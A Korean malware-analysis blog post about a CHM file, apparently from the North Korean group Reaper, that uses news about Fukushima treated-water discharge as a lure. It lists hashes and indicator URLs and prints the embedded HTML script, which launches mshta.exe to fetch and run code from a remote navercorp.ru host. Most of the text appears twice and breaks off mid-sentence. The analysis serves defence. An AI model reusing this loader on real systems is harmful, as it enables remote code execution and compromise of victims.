북한 해킹 단체 Reaper(리퍼)에서 만든 후쿠시마 오염수 방류(후쿠시마 처리수) 내용을 악용한 악성코드-1.chm(2023.9.5)
Contents
오늘은 후쿠시마 오염수 방류 내용을 악용한 악성코드인 1.chm에 대해 글을 적어 보겠습니다.
일단 해당 정치적 이야기는 하지 않을 것이면 그냥 순수하게 악성코드만 분석하겠습니다. 일단 후쿠시마 오염수 방류(후쿠시마 처리수) 악성코드는 최근에 가장 핫한 이슈인 후쿠시마 오염수 방류(후쿠시마 처리수)내용을 다루고 있습니다.
먼저 악성코드 해쉬값은 다음과 같습니다.
파일명:1.chm
사이즈:12.6 KB
CRC32:b4756c7d
MD5:9e6a2914a35256dd450db549fb975f45
SHA-1:a7398bdf6d742d8f76219b92893b8c4317435cc1
SHA-256:b31b89e646de6e9c5cbe21798e0157fef4d8e612d181085377348c974540760a
즉 한국, 일본, 중국에서 뉴스에서 가장 자주 언급이 되는 뉴스를 다루는 사회공학적 공격(ソーシャル・エンジニアリング,social engineering) 방법을 사용하고 있으며 먼저 해당 악성코드를 분석하기 위해서 chm 파일을 분해해야 분석을 진행합니다.
먼저 chm 파일 내에서 Documents 부분 아래에 Start.html 부분을 열어 보아야지 해당 코드를 볼 수가 있습니다.
기존에는 mshta 명령어를 CHM 파일(hh.exe)에서 바로 실행하던 방식이었지만 최근 유포되는 파일에서는 레지스터리 에 있는 컴퓨터 시작하자 말자 실행을 하게 RUN 키에 해당 명령어를 등록하여 시스템이 재부팅될 때 실행하도록 변경을 하는 수법을 사용하고 있습니다.
먼저 해당 악성코드에 포함된 스크립트는 다음과 같습니다.
<html> <head><meta http-equiv='Content-Type' content='text/html;charset=UTF-8'></head> <body> <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1> <PARAM name="Command" value="ShortCut"> <PARAM name="Button" value="Bitmap::shortcut"> <PARAM name="Item1" value=",mshta.exe, http://navercorp(.)ru/dashboard/image/202302/4(.)html ,"> <PARAM name="Item2" value="273,1,1"> </OBJECT> <script> x(.)Click(); </SCRIPT> </div>
악성 …
일단 해당 정치적 이야기는 하지 않을 것이면 그냥 순수하게 악성코드만 분석하겠습니다. 일단 후쿠시마 오염수 방류(후쿠시마 처리수) 악성코드는 최근에 가장 핫한 이슈인 후쿠시마 오염수 방류(후쿠시마 처리수)내용을 다루고 있습니다.
먼저 악성코드 해쉬값은 다음과 같습니다.
파일명:1.chm
사이즈:12.6 KB
CRC32:b4756c7d
MD5:9e6a2914a35256dd450db549fb975f45
SHA-1:a7398bdf6d742d8f76219b92893b8c4317435cc1
SHA-256:b31b89e646de6e9c5cbe21798e0157fef4d8e612d181085377348c974540760a
즉 한국, 일본, 중국에서 뉴스에서 가장 자주 언급이 되는 뉴스를 다루는 사회공학적 공격(ソーシャル・エンジニアリング,social engineering) 방법을 사용하고 있으며 먼저 해당 악성코드를 분석하기 위해서 chm 파일을 분해해야 분석을 진행합니다.
먼저 chm 파일 내에서 Documents 부분 아래에 Start.html 부분을 열어 보아야지 해당 코드를 볼 수가 있습니다.
기존에는 mshta 명령어를 CHM 파일(hh.exe)에서 바로 실행하던 방식이었지만 최근 유포되는 파일에서는 레지스터리 에 있는 컴퓨터 시작하자 말자 실행을 하게 RUN 키에 해당 명령어를 등록하여 시스템이 재부팅될 때 실행하도록 변경을 하는 수법을 사용하고 있습니다.
먼저 해당 악성코드에 포함된 스크립트는 다음과 같습니다.
<html> <head><meta http-equiv='Content-Type' content='text/html;charset=UTF-8'></head> <body> <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1> <PARAM name="Command" value="ShortCut"> <PARAM name="Button" value="Bitmap::shortcut"> <PARAM name="Item1" value=",mshta.exe, http://navercorp(.)ru/dashboard/image/202302/4(.)html ,"> <PARAM name="Item2" value="273,1,1"> </OBJECT> <script> x(.)Click(); </SCRIPT> </div>
악성 …
IoC
9e6a2914a35256dd450db549fb975f45
a7398bdf6d742d8f76219b92893b8c4317435cc1
b31b89e646de6e9c5cbe21798e0157fef4d8e612d181085377348c974540760a
http://navercorp.ru/dashboard/image/202302/4.html
http://navercorp.ru/dashboard/image/202302/com.php
a7398bdf6d742d8f76219b92893b8c4317435cc1
b31b89e646de6e9c5cbe21798e0157fef4d8e612d181085377348c974540760a
http://navercorp.ru/dashboard/image/202302/4.html
http://navercorp.ru/dashboard/image/202302/com.php